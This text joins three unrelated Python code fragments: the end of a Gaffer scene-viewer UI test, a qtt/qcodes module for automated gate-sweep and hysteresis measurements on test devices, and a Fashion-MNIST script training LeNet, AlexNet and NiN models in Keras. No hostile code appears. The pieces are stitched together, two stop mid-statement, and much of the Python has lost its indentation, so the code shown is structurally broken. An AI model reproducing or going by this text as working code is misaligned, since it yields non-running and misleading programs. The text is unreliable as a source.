s["f"]["paths"].setValue( IECore.StringVectorData( [ "/bigSphere/littleSphere" ] ) )
s["a"]["filter"].setInput( s["f"]["out"] )
# Try to view it
sg = GafferSceneUI.SceneGadget()
sg.setScene( s["a"]["out"] )
sg.setMinimumExpansionDepth( 4 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
gw.getViewportGadget().setPlanarMovement( False )
gw.getViewportGadget().setCamera(
IECoreScene.Camera( parameters = { "projection" : "perspective", } )
)
originalMessageHandler = IECore.MessageHandler.getDefaultHandler()
mh = IECore.CapturingMessageHandler()
IECore.MessageHandler.setDefaultHandler(
IECore.LevelFilteredMessageHandler( mh, IECore.LevelFilteredMessageHandler.defaultLevel() )
)
try :
w.setVisible( True )
self.waitForIdle( 1000 )
sg.waitForCompletion()
# Check we were told about the problem
self.assertEqual( len( mh.messages ), 1 )
self.assertEqual( mh.messages[0].level, mh.Level.Error )
self.assertTrue( "nonexistent" in mh.messages[0].message )
# And that there isn't some half-assed partial scene
# being displayed.
self.assertTrue( sg.bound().isEmpty() )
gw.getViewportGadget().frame( imath.Box3f( imath.V3f( -1 ), imath.V3f( 1 ) ) )
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
# And that redraws don't cause more fruitless attempts
# to compute the scene.
gw.getViewportGadget().frame( imath.Box3f( imath.V3f( -1.1 ), imath.V3f( 1.1 ) ) )
self.waitForIdle( 1000 )
self.assertEqual( len( mh.messages ), 1 )
self.assertObjectAt( sg, imath.V2f( 0.5 ), None )
self.assertTrue( sg.bound().isEmpty() )
# Fix the problem with the scene, and check that we can see something now
s["f"]["enabled"].setValue( False )
sg.waitForCompletion()
self.assertEqual( len( mh.messages ), 1 )
self.assertFalse( sg.bound().isEmpty() )
self.assertObjectAt( sg, imath.V2f( 0.5 ), IECore.InternedStringVectorData( [ "bigSphere" ] ) )
finally :
IECore.MessageHandler.setDefaultHandler( originalMessageHandler )
def testObjectsAtBox( self ) :
plane = GafferScene.Plane()
sphere = GafferScene.Sphere()
sphere["radius"].setValue( 0.25 )
instancer = GafferScene.Instancer()
instancer["in"].setInput( plane["out"] )
instancer["prototypes"].setInput( sphere["out"] )
instancer["parent"].setValue( "/plane" )
subTree = GafferScene.SubTree()
subTree["in"].setInput( instancer["out"] )
subTree["root"].setValue( "/plane" )
sg = GafferSceneUI.SceneGadget()
sg.setScene( subTree["out"] )
sg.setMinimumExpansionDepth( 100 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 10000 )
gw.getViewportGadget().frame( sg.bound() )
self.waitForIdle( 10000 )
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0 ), imath.V2f( 1 ) ),
[ "/instances/sphere/{}".format( i ) for i in range( 0, 4 ) ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0 ), imath.V2f( 0.5 ) ),
[ "/instances/sphere/2" ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0.5, 0 ), imath.V2f( 1, 0.5 ) ),
[ "/instances/sphere/3" ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0, 0.5 ), imath.V2f( 0.5, 1 ) ),
[ "/instances/sphere/0" ]
)
self.assertObjectsAt(
sg,
imath.Box2f( imath.V2f( 0.5 ), imath.V2f( 1 ) ),
[ "/instances/sphere/1" ]
)
def testObjectAtLine( self ) :
cubes = []
names = ( "left", "center", "right" )
for i in range( 3 ) :
cube = GafferScene.Cube()
cube["transform"]["translate"].setValue( imath.V3f( ( i - 1 ) * 2.0, 0.0, -2.5 ) )
cube["name"].setValue( names[i] )
cubes.append( cube )
group = GafferScene.Group()
for i, cube in enumerate( cubes ) :
group["in"][i].setInput( cube["out"] )
sg = GafferSceneUI.SceneGadget()
sg.setScene( group["out"] )
sg.setMinimumExpansionDepth( 100 )
with GafferUI.Window() as w :
gw = GafferUI.GadgetWidget( sg )
w.setVisible( True )
self.waitForIdle( 10000 )
vp = gw.getViewportGadget()
# This is the single most important line in this test. If you don't set
# this to false, you get an orthographic camera, even if you set a
# perspective projection.
vp.setPlanarMovement( False )
c = IECoreScene.Camera()
c.setProjection( "perspective" )
c.setFocalLength( 35 )
c.setAperture( imath.V2f( 36, 24 ) )
vp.setCamera( c )
cameraTransform = imath.M44f()
cameraTransform.translate( imath.V3f( 0, 0, 2 ) )
vp.setCameraTransform( cameraTransform )
self.waitForIdle( 10000 )
# We assume in this case, that gadget space is world space
leftCubeDir = IECore.LineSegment3f( imath.V3f( 0, 0, 2 ), imath.V3f( -2, 0, -2 ) )
pathA = sg.objectAt( leftCubeDir )
pathB, hitPoint = sg.objectAndIntersectionAt( leftCubeDir )
self.assertIsNotNone( pathA )
self.assertEqual( pathA, IECore.InternedStringVectorData( [ "group", "left" ] ) )
self.assertEqual( pathA, pathB )
self.assertAlmostEqual( hitPoint.x, -2, delta = 0.01 )
self.assertAlmostEqual( hitPoint.y, 0, delta = 0.01 )
self.assertAlmostEqual( hitPoint.z, -2, delta = 0.01 )
centerCubeDir = IECore.LineSegment3f( imath.V3f( 0, 0, 1 ), imath.V3f( 0, 0, -1 ) )
pathA = sg.objectAt( centerCubeDir )
pathB, hitPoint = sg.objectAndIntersectionAt( centerCubeDir )
self.assertIsNotNone( pathA )
self.assertEqual( pathA, IECore.InternedStringVectorData( [ "group", "center" ] | |
# -*- coding: utf-8 -*-
"""
Created on Tue Sep 1 16:32:55 2020
IN DEVELOPMENT
atm - automated test measurements
Utility toolset that will eventually enable automated measurement of test structure devices.
Consists of a few important classes:
MeasurementControl - performs and analyses measurements according to a process
MeasurementAnalysis - used to analyse measurement datasets
MeasurementProcess - an algorithm that specifies the sequence of measurements to be performed
MeasurementMap - contains functions to work out correct gates and instruments for a given measurement
MeasurementGeometry - physical geometry of the sample, for now we will only consider linear arrays
@author: krolljg
"""
import qcodes
from qcodes import Instrument
import qtt
from qtt.measurements.scans import scanjob_t, scan1D, scan2D, scan1Dfeedback
from qtt.automation.measurement_analysis import MeasurementAnalysis
import time
import numpy as np
import scipy.optimize as optimisation
class MeasurementControl(Instrument):
"""
Class that allows for control of measurements.
"""
def __init__(
self,
sample_name: str,
station: object,
datadir: str,
autoanalysis: bool = True, #autoanalysis to be implemented
liveplotting: bool = False,
verbose: bool = True,
**kwargs
):
super().__init__(sample_name+'Control', **kwargs)
qcodes.DataSet.default_io = qcodes.DiskIO(datadir)
self.station = station
self.gates = station.gates
self.autoanalysis = autoanalysis
self.liveplotting = liveplotting
self.verbose = verbose
def scan_1D(self, scan_gate, start, end, step, meas_instr, pause_before_start=None, wait_time=0.02,
abort_controller=None,plot_param=None,sub_plots=None):
''' Used to sweep a gate and measure on some instruments '''
if pause_before_start is not None:
try:
self.gates.set(scan_gate, start)
except:
scan_gate(start)
time.sleep(pause_before_start)
scanjob = scanjob_t({'sweepdata': dict({'param': scan_gate,
'start': start,
'end': end,
'step': step,
'wait_time': wait_time}), 'minstrument': meas_instr})
if abort_controller is not None:
dataset = scan1Dfeedback(self.station, scanjob, location=None, verbose=self.verbose, abort_controller=abort_controller, plotparam=plot_param,subplots=sub_plots)
else:
dataset = scan1D(self.station, scanjob, location=None, verbose=self.verbose, plotparam=plot_param,subplots=sub_plots)
return dataset
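    # Hedged usage sketch (added for illustration; the gate and instrument names are
    # assumptions): sweep one gate from 0 mV to 500 mV in 5 mV steps while reading a
    # current parameter.
    #
    # dataset = measurement_control.scan_1D(
    #     scan_gate='SD1a', start=0, end=500, step=5,
    #     meas_instr=[keithley.amplitude], pause_before_start=2,
    # )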
def scan_2D(self, sweep_gate, sweep_start, sweep_end, sweep_step, step_gate, step_start, step_end, step_step,
meas_instr, pause_before_start=None, sweep_wait=0.02, step_wait=0.02, plot_param=None):
''' Used to sweep a gate and measure on some instruments '''
if pause_before_start is not None:
try:
self.gates.set(step_gate, step_start)
except:
step_gate(step_start)
time.sleep(pause_before_start)
scanjob = scanjob_t({'sweepdata': dict({'param': sweep_gate,
'start': sweep_start,
'end': sweep_end,
'step': sweep_step,
'wait_time': sweep_wait}),
'stepdata': dict({'param': step_gate,
'start': step_start,
'end': step_end,
'step': step_step,
'wait_time': step_wait}),
'minstrument': meas_instr})
dataset = qtt.measurements.scans.scan2D(self.station, scanjob, plotparam=plot_param)
return dataset
def drift_scan(self, scan_gate, start, end_voltage_list, step, meas_instr, forward_datasets = None,
backward_datasets= None, auto_plot=False, threshold=None):
''' Used to perform 1D sweeps up to increasingly higher voltages to look at drift '''
try:
self.gates.set(scan_gate, start)
except:
scan_gate(start)
time.sleep(0.5)
if forward_datasets is None:
forward_datasets = []
if backward_datasets is None:
backward_datasets = []
MA = MeasurementAnalysis()
for end in end_voltage_list:
dataset_forward = self.scan_1D(scan_gate, start, end, step, meas_instr)
forward_datasets.append(dataset_forward)
dataset_backward = self.scan_1D(scan_gate, end, start, step, meas_instr)
backward_datasets.append(dataset_backward)
if auto_plot:
MA.plot_multiple_scans(forward_datasets,backward_datasets)
MA.plot_drift_scans(forward_datasets,backward_datasets)
if threshold is not None:
forward_max = np.max(MA.forward_diff_list)
backward_max = np.max(MA.backward_diff_list)
if (forward_max>threshold) or (backward_max>threshold):
break # stop the loop when we have entered hysteresis
return forward_datasets, backward_datasets
def find_hysteresis(self, scan_gate, start, end_voltage_list, step, meas_instr, plot_param=None, sub_plots=False, forward_datasets = None,
backward_datasets= None, threshold=None, pause_before_start=0):
        ''' Used to perform 1D sweeps to increasingly higher end voltages to look for hysteresis '''
try:
self.gates.set(scan_gate, start)
except:
scan_gate(start)
time.sleep(0.5)
if forward_datasets is None:
forward_datasets = []
if backward_datasets is None:
backward_datasets = []
# creating analysis object for each figure. turning off powerpoint generation
SweepAnalysis = MeasurementAnalysis(add_ppts=False)
DriftAnalysis = MeasurementAnalysis(add_ppts=False)
# creating empty hysteresis object
hysteresis_point = None
for end in end_voltage_list:
dataset_forward = self.scan_1D(scan_gate, start, end, step, meas_instr, plot_param=plot_param, sub_plots=sub_plots, pause_before_start=pause_before_start)
forward_datasets.append(dataset_forward)
dataset_backward = self.scan_1D(scan_gate, end, start, step, meas_instr, plot_param=plot_param, sub_plots=sub_plots, pause_before_start=pause_before_start)
backward_datasets.append(dataset_backward)
SweepAnalysis.plot_drift_scans(forward_datasets,backward_datasets,new_fig=False)
SweepAnalysis.fig.canvas.draw()
DriftAnalysis.analyse_drift_scans(forward_datasets,backward_datasets,new_fig=False)
DriftAnalysis.fig.canvas.draw()
if (threshold is not None) and (len(DriftAnalysis.forward_diff_list)>=1):
forward_max = np.max(DriftAnalysis.forward_diff_list)
backward_max = np.max(DriftAnalysis.backward_diff_list)
if (forward_max>threshold) or (backward_max>threshold):
# generate plots
SweepAnalysis.add_ppts = True
DriftAnalysis.add_ppts = True
SweepAnalysis.plot_drift_scans(forward_datasets, backward_datasets, new_fig=False)
DriftAnalysis.analyse_drift_scans(forward_datasets, backward_datasets, new_fig=False)
hysteresis_point = np.max(DriftAnalysis.xvar)
break # stop the loop when we have entered hysteresis
self.forward_datasets = forward_datasets
self.backward_datasets = backward_datasets
return forward_datasets, backward_datasets, hysteresis_point
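    # Hedged usage sketch (gate name, voltages and threshold are assumptions): step the
    # accumulation gate to progressively higher end voltages until the analysed shift
    # exceeds the chosen threshold.
    #
    # fwd, bwd, hyst_point = measurement_control.find_hysteresis(
    #     scan_gate='ACC1', start=0, end_voltage_list=[400, 600, 800, 1000], step=5,
    #     meas_instr=[keithley.amplitude], threshold=5,
    # )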
class FourProbe(qcodes.Parameter):
'''
Qcodes metainstrument that measures four probe resistance or resistivity (for hallbars).
name
Vparam: qcodes parameter for voltage measurement
Iparam: qcodes parameter for current measurement
return_parameter='R': parameter to return. 'R', 'Rho_xx','Rho_xy'
aspect_ratio=None: aspect ratio for hallbar used in Rho_xx
I_threshold=1e-10: current threshold below which it returns 'nan'
'''
def __init__(self, name, Vparam, Iparam, return_parameter='R', aspect_ratio=None, I_threshold=1e-10):
super().__init__(name, label=return_parameter, unit='Ohm')
self.V_param = Vparam
self.I_param = Iparam
self.aspect_ratio = aspect_ratio
self.I_threshold = I_threshold
self.return_parameter = return_parameter
        if (return_parameter.lower() == 'rho_xx') and (aspect_ratio is None):
raise Exception ('You must set the aspect ratio for rho measurements.')
# you must provide a get method, a set method, or both.
def get_raw(self):
V = self.V_param.get()
I = self.I_param.get()
val = float('nan')
if I > self.I_threshold:
val = V/I
if self.return_parameter.lower() == 'rho_xx':
val = V/I/self.aspect_ratio
return val
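    # Hedged usage sketch (the instrument parameter names are assumptions): wire two
    # lock-in readings into a four-probe resistance parameter.
    #
    # r_4p = FourProbe('R_4probe', Vparam=lockin_v.X, Iparam=lockin_i.X,
    #                  return_parameter='R', I_threshold=1e-10)
    # r_4p.get()  # -> V/I in Ohm, or nan when the current is below the threshold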
class SoftSwitches():
''' Class to control softswitches to switch between measuring accumulation and constrictions.
geometry - ordered list of gate and ohmic names representing their geometric layout '''
def __init__(self, geometry=None, gates=None):
        if geometry is None:
raise Exception('Please initialise with a geometry')
self.geometry = geometry
self.gates = gates
self.ohmics = [oo for oo in geometry if oo[0] == 'O']
def set_contacts(self, gate_name):
''' Pass string containing gate name, and the correct Ohmics will automatically be selected. '''
for oo in self.ohmics: # ensures other contacts are open
self.gates.set(oo, 0)
pos = self.geometry.index(gate_name)
# turning on relevant ohmics
self.gates.set(self.geometry[pos - 1], 2000)
self.gates.set(self.geometry[(pos + 1) %len(self.geometry)], 2000)
time.sleep(1) # hard coded 1 second wait to allow switches to settle
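    # Hedged usage sketch (gate and ohmic names are made up): a linear array alternating
    # ohmics and gates; selecting a gate closes the two neighbouring contacts.
    #
    # soft_switches = SoftSwitches(geometry=['O1', 'ACC1', 'O2', 'ACC2', 'O3'], gates=station.gates)
    # soft_switches.set_contacts('ACC1')  # opens all ohmics, then sets O1 and O2 to 2000 mV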
class DetermineTurnOn(Instrument):
'''
AbortController object to determine if a measurement should be stopped.
Arguments:
station - current measurement station
meas_par - parameter we are monitoring
threshold - parameter for the method that checks whether to abort
**kwargs - passed to Instrument super init
Method:
check_abort(dataset)
'''
def __init__(self, station, method = None, **kwargs):
super().__init__('Turn_On_Controller', **kwargs)
self.station = station
self.method = method
self.methodkwargs = {'threshold': 0.3e-9}
self.ps = []
def set_params(self, sweep_par, meas_par):
self.sweep_par = sweep_par
self.meas_par = meas_par
def check_abort(self, dataset):
''' Return True if the measurement should be aborted. '''
abort = False
if self.method is None or self.method == 'threshold':
threshold = self.methodkwargs['threshold']
abort = np.nanmax(dataset.arrays[self.meas_par]) > threshold
if self.method == 'gradient':
abort = self.gradient_method(dataset)
return abort
def set_method(self,method, **kwargs):
self.method = method
self.methodkwargs = kwargs
def gradient_method(self,dataset):
abort = False
def linearmodel(x, m, c):
return x * m + c
def linearfit(x, y): # return fit and r squared value
popt, pcov = optimisation.curve_fit(linearmodel, x, y, p0=[0, 0])
residuals = y - linearmodel(x, *popt)
ss_res = np.sum(residuals ** 2)
ss_tot = np.sum((y - np.mean(y)) ** 2)
r_squared = 1 - (ss_res / ss_tot)
return popt, r_squared
y = dataset.arrays[self.meas_par]
y = y[np.isfinite(y)]
x = dataset.arrays[self.sweep_par][:len(y)]
filterwindow = self.methodkwargs['filterwindow']
gradient = self.methodkwargs['gradient']
if len(x) >= filterwindow:
xsub = x[-filterwindow:]
ysub = y[-filterwindow:]
popt, r_sq = linearfit(xsub, ysub)
self.ps.append(popt)
if popt[0] > gradient:
abort = True
else:
abort = False
return abort
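    # Hedged usage sketch (parameter names and threshold values are assumptions):
    # configure the abort controller before passing it to MeasurementControl.scan_1D.
    #
    # turn_on = DetermineTurnOn(station)
    # turn_on.set_params(sweep_par='ACC1', meas_par='keithley_amplitude')
    # turn_on.set_method('gradient', filterwindow=20, gradient=1e-12)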
class AutomatedMeasurement():
'''
Class to control automated measurements. Should initialise with station, device geometry and measurement method. Bias voltage should be set beforehand.
station - qcodes station object
geometry - list of gate names ordered by their physical location
soft_switches - SoftSwitches object to set the right Ohmics to measure
abort_controller - AbortController object used to determine when gates have turned on
accs - list of accumulation gate names
cons - list of constriction gate names
meas_instr - list of instruments to measure with
'''
def __init__(self,measurement_controller, measurement_analysis, geometry, soft_switches, abort_controller,
accs, cons, meas_instr, bias_voltage=100e-6, step = 5, start = 0, turn_on_ramp = 100, pause_before_start=2):
self.MC = measurement_controller
self.MA = measurement_analysis
self.station = self.MC.station
self.geometry = geometry
self.AC = abort_controller
self.soft_switches = soft_switches
self.cons = cons
self.accs = accs
self.gate_data = {gg: {'turn_on': None,
'hysteresis': None,
'datasets': []
} for gg in accs + cons}
self.meas_instr = meas_instr
self.step = step
self.start = start
self.turn_on_ramp = turn_on_ramp
self.p_b_s = pause_before_start
def measure_sample(self, safe_gate_voltage = 600, max_voltage = 1000, gate_increment = 100, con_offset = 200,
hysteresis_target = 1200):
''' Runs measurement procedure on sample. '''
self.measure_turn_ons(self.accs, safe_gate_voltage, max_voltage, gate_increment)
# sweep up constrictions to maximum of adjacent transistor turn on + constriction offset
# if adjacent constrictions are not on, use lowest value for other accs then up to max voltage
# moving to ...
# -*- coding: utf-8 -*-
import os
import numpy as np
import pandas as pd
from sklearn.model_selection import train_test_split
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
IMG_ROWS = 28
IMG_COLS = 28
NUM_CLASSES = 10
VALID_SIZE = 0.2
RANDOM_STATE = 456
np.random.seed(RANDOM_STATE)
PATH = "../data/FashionMNIST"
train_file = os.path.join(PATH, "fashion-mnist_train.csv")
test_file = os.path.join(PATH, "fashion-mnist_test.csv")
train_data = pd.read_csv(train_file)
print("train data:", train_data.shape)
test_data = pd.read_csv(test_file)
print("test data:", test_data.shape)
# Create a dictionary for each type of label
labels = {0 : "T-shirt/top", 1: "Trouser", 2: "Pullover", 3: "Dress", 4: "Coat",
5: "Sandal", 6: "Shirt", 7: "Sneaker", 8: "Bag", 9: "Ankle Boot"}
def get_label_distribution(data, needPlot=False):
label_counts = data['label'].value_counts()
total_samples = len(data)
    for i in range(len(label_counts)):
label = labels[label_counts.index[i]]
count = label_counts.values[i]
percent = (count / total_samples) * 100
print("{:<20s}: {} or {}%".format(label, count, percent))
if needPlot:
        f, ax = plt.subplots(1, 1, figsize=(12, 4))
g = sns.countplot(data.label, order=data['label'].value_counts().index)
g.set_title("Number of labels for each class")
for p, label in zip(g.patches, data["label"].value_counts().index):
g.annotate(labels[label], (p.get_x(), p.get_height()+0.1))
plt.show()
def sample_images_data(data):
sample_images = []
sample_labels = []
for k in labels.keys():
samples = data[data['label']==k].head(4)
for j,s in enumerate(samples.values):
img = np.array(samples.iloc[j, 1:]).reshape(IMG_ROWS, IMG_COLS)
sample_images.append(img)
sample_labels.append(samples.iloc[j, 0])
print("Total number of sample images to plot: ", len(sample_images))
return sample_images, sample_labels
def plot_sample_images(data_sample_images, data_sample_labels, cmap="Blues"):
f, ax = plt.subplots(5,8, figsize=(16,10))
for i,img in enumerate(data_sample_images):
ax[i//8, i%8].imshow(img, cmap=cmap)
ax[i//8, i%8].axis('off')
ax[i//8, i%8].set_title(labels[data_sample_labels[i]])
plt.show()
def data_preprocessing(data):
y = pd.get_dummies(data.values[:, 0]).values
num_images = data.shape[0]
x_as_array = data.values[:, 1:]
x_reshape = x_as_array.reshape(num_images, IMG_ROWS, IMG_COLS, 1)
X = x_reshape / 255
return X, y
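# Hedged sanity-check helper (added for illustration, not called anywhere): for the
# 60000-row Fashion-MNIST training CSV, data_preprocessing() should return X of shape
# (60000, 28, 28, 1) with values scaled to [0, 1] and one-hot y of shape (60000, 10).
def _check_preprocessed_shapes(X, y):
    assert X.shape[1:] == (IMG_ROWS, IMG_COLS, 1)
    assert y.shape[1] == NUM_CLASSES
    assert X.min() >= 0.0 and X.max() <= 1.0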
def plot_count_per_class(yd):
ydf = pd.DataFrame(yd)
f, ax = plt.subplots(1, 1, figsize=(12, 4))
g = sns.countplot(ydf[0], order=np.arange(0, 10))
g.set_title("Number of items for each class")
g.set_xlabel("Category")
for p, label in zip(g.patches, np.arange(0, 10)):
g.annotate(labels[label], (p.get_x(), p.get_height() + 0.1))
plt.show()
def get_count_per_class(yd):
ydf = pd.DataFrame(yd)
# Get the count for each label
label_counts = ydf[0].value_counts()
# Get total number of samples
total_samples = len(yd)
# Count the number of items in each class
for i in range(len(label_counts)):
label = labels[label_counts.index[i]]
count = label_counts.values[i]
percent = (count / total_samples) * 100
print("{:<20s}: {} or {}%".format(label, count, percent))
def plot_train_vlad_curve(history):
# plot training / validation loss & acc
plt.figure(figsize=(14, 5))
plt.subplot(1, 2, 1)
plt.suptitle('Train results', fontsize=10)
plt.xlabel('Number of Epochs')
plt.ylabel('Loss', fontsize=16)
plt.plot(history.history['loss'], color='b', label='Training Loss')
plt.plot(history.history['val_loss'], color='r', label='Validation Loss')
plt.legend(loc='upper right')
plt.subplot(1, 2, 2)
plt.ylabel('Accuracy', fontsize=16)
plt.plot(history.history['acc'], color='green', label='Training Accuracy')
plt.plot(history.history['val_acc'], color='orange', label='Validation Accuracy')
plt.legend(loc='lower right')
plt.show()
#train_sample_images, train_sample_labels = sample_images_data(train_data)
#plot_sample_images(train_sample_images, train_sample_labels, "Greens")
# print("Label distribution in training data:")
# get_label_distribution(train_data, needPlot=True)
X_raw, y_raw = data_preprocessing(train_data)
X_test, y_test = data_preprocessing(test_data)
X_train, X_val, y_train, y_val = train_test_split(X_raw, y_raw, test_size=VALID_SIZE, random_state=RANDOM_STATE)
print("Fashion MNIST train - rows:", X_train.shape[0], " columns:", X_train.shape[1:4])
print("Fashion MNIST valid - rows:", X_val.shape[0], " columns:", X_val.shape[1:4])
print("Fashion MNIST test - rows:", X_test.shape[0], " columns:", X_test.shape[1:4])
print("y_train.shape:", y_train.shape)
print(np.argmax(y_train, axis=1))
#plot_count_per_class(np.argmax(y_train, axis=1))
#get_count_per_class(np.argmax(y_train, axis=1))
needTSNE = False
if needTSNE:
from sklearn.utils import shuffle
tsne_obj = TSNE(n_components=2,
init='pca',
random_state=RANDOM_STATE,
method='barnes_hut',
n_iter=250,
verbose=2)
index_input = list(range(len(X_val)))
index_sample = shuffle(index_input, random_state=RANDOM_STATE)[:1000]
print(index_sample)
X_val_sample = X_val[index_sample]
    y_val_sample = np.argmax(y_val[index_sample], axis=1)  # class indices (not one-hot) for the comparisons below
tsne_features = tsne_obj.fit_transform(np.reshape(X_val_sample, [X_val_sample.shape[0], -1]))
obj_categories = ['T-shirt/top','Trouser','Pullover','Dress','Coat','Sandal','Shirt','Sneaker','Bag','Ankle boot']
colors = plt.cm.rainbow(np.linspace(0, 1, 10))
plt.figure(figsize=(10, 10))
for c_group, (c_color, c_label) in enumerate(zip(colors, obj_categories)):
print("c_group:", c_group)
print("c_color:", c_color)
print("c_label:", c_label)
plt.scatter(tsne_features[np.where(y_val_sample == c_group), 0],
tsne_features[np.where(y_val_sample == c_group), 1],
marker='o',
color=c_color,
linewidth='1',
alpha=0.8,
label=c_label)
plt.xlabel('Dimension 1')
plt.ylabel('Dimension 2')
plt.title('t-SNE on Testing Samples')
plt.legend(loc='best')
plt.savefig('clothes-dist.png')
plt.show(block=False)
import keras
#keras.backend.set_image_dim_ordering('th')
from keras.models import Sequential, model_from_json
from keras.layers import Dense, Conv2D, Activation, MaxPool2D, Flatten, Dropout, BatchNormalization
from keras.optimizers import RMSprop, Adam, SGD
from keras.preprocessing.image import ImageDataGenerator
from keras.callbacks import ModelCheckpoint
# data augmentation
datagen = ImageDataGenerator(
featurewise_center=False, # set input mean to 0 over the dataset
samplewise_center=False, # set each sample mean to 0
featurewise_std_normalization=False, # divide inputs by std of the dataset
samplewise_std_normalization=False, # divide each input by its std
    zca_whitening=False,  # apply ZCA whitening
rotation_range=0.1, # randomly rotate image in the range
zoom_range=0.1, # randomly zoom image
width_shift_range=0.1, # randomly shift image horizontally
height_shift_range=0.1, # randomly shift image vertically
horizontal_flip=False, # randomly flip images
vertical_flip=False # randomly flip images
)
datagen.fit(X_train)
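# Note (standard Keras generator semantics, added for clarity): datagen.flow() yields
# augmented (x, y) batches indefinitely, which is why the generator-based training
# calls below pass steps_per_epoch explicitly, e.g.
#   net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
#                     steps_per_epoch=X_train.shape[0] // BATCH_SIZE, ...)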
#Model
input_shape = [None,28,28,1]
NO_EPOCHS = 50
BATCH_SIZE = 128
#optimizer = RMSprop(lr=.001, rho=0.9, epsilon=1e-08, decay=0.0)
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
#region LeNet
from dlexp.model import lenet
needTrainLenet = False
needTestLenet = False
if needTrainLenet:
lenet.net.build(input_shape)
lenet.net.summary()
lenet.net.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
#checkpoint = ModelCheckpoint(filepath='lenet_model.h5', verbose=1, save_best_only=True)
log_filepath = 'checkpoint/log_lenet'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_lenet.h5'
    cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only=True)
cbks = [tb_cb, cp_cb]
    history = lenet.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
#callbacks=[checkpoint]
)
    # save model
#model_json = lenet.net.to_json()
#lenet.net.save_weights('lenet_model.h5', save_format='h5')
#lenet.net.load_weights('lenet_model.h5')
lenet.net.save('checkpoint/lenet_model.h5')
#model = tf.keras.models.load_model('lenet_model.h5')
# plot training / validation loss & acc
plt.figure(figsize=(14, 5))
plt.subplot(1, 2, 1)
    plt.suptitle('Train results', fontsize=10)
plt.xlabel('Number of Epochs')
plt.ylabel('Loss', fontsize=16)
plt.plot(history.history['loss'], color='b', label='Training Loss')
plt.plot(history.history['val_loss'], color='r', label='Validation Loss')
plt.legend(loc='upper right')
plt.subplot(1, 2, 2)
plt.ylabel('Accuracy', fontsize=16)
plt.plot(history.history['acc'], color='green', label='Training Accuracy')
plt.plot(history.history['val_acc'], color='orange', label='Validation Accuracy')
plt.legend(loc='lower right')
plt.show()
if needTestLenet:
new_model = keras.models.load_model('checkpoint/lenet_model.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('lenet', 100*acc))
#endregion
#region AlexNet
from dlexp.model import alexnet
needTrainAlexNet = False
needTestAlexNet = False
if needTrainAlexNet:
alexnet.net.build(input_shape)
alexnet.net.summary()
alexnet.net.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# checkpoint = ModelCheckpoint(filepath='alexnet_model.h5', verbose=1, save_best_only=True)
log_filepath = 'checkpoint/log_alexnet'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_alexnet.h5'
    cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only=True)
cbks = [tb_cb, cp_cb]
history = alexnet.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
alexnet.net.save('checkpoint/alexnet_model.h5')
# model = tf.keras.models.load_model('alexnet_model.h5')
# plot training / validation loss & acc
plt.figure(figsize=(14, 5))
plt.subplot(1, 2, 1)
plt.suptitle('Train results', fontsize=10)
plt.xlabel('Number of Epochs')
plt.ylabel('Loss', fontsize=16)
plt.plot(history.history['loss'], color='b', label='Training Loss')
plt.plot(history.history['val_loss'], color='r', label='Validation Loss')
plt.legend(loc='upper right')
plt.subplot(1, 2, 2)
plt.ylabel('Accuracy', fontsize=16)
plt.plot(history.history['acc'], color='green', label='Training Accuracy')
plt.plot(history.history['val_acc'], color='orange', label='Validation Accuracy')
plt.legend(loc='lower right')
plt.show()
if needTestAlexNet:
new_model = keras.models.load_model('checkpoint/alexnet_model.h5')
new_model.summary()
new_model.compile(optimizer=optimizer, loss="categorical_crossentropy", metrics=["accuracy"])
# Evaluate the restored model.
loss, acc = new_model.evaluate(X_test, y_test)
print("Restored model {}, accuracy: {:5.2f}%".format('alexnet', 100*acc))
#endregion
#region NiNet
from dlexp.model import nin
needTrainNin = False
needTestNin = False
optimizer = Adam(lr=.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)
if needTrainNin:
nin.net.build(input_shape)
nin.net.summary()
nin.net.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=["accuracy"])
log_filepath = 'checkpoint/log_nin'
tb_cb = keras.callbacks.TensorBoard(log_dir=log_filepath, write_images=1, histogram_freq=1)
cp_filepath = 'checkpoint/cp_nin.h5'
    cp_cb = ModelCheckpoint(filepath=cp_filepath, monitor='val_acc', mode='max', save_best_only=True)
cbks = [tb_cb, cp_cb]
history = nin.net.fit_generator(datagen.flow(X_train, y_train, batch_size=BATCH_SIZE),
shuffle=True,
epochs=NO_EPOCHS,
validation_data=(X_val, y_val),
verbose=2,
steps_per_epoch=X_train.shape[0] // BATCH_SIZE,
callbacks=cbks
# callbacks=[checkpoint]
)
# save model
nin.net.save('checkpoint/nin_model.h5')
# model = tf.keras.models.load_model('nin_model.h5')
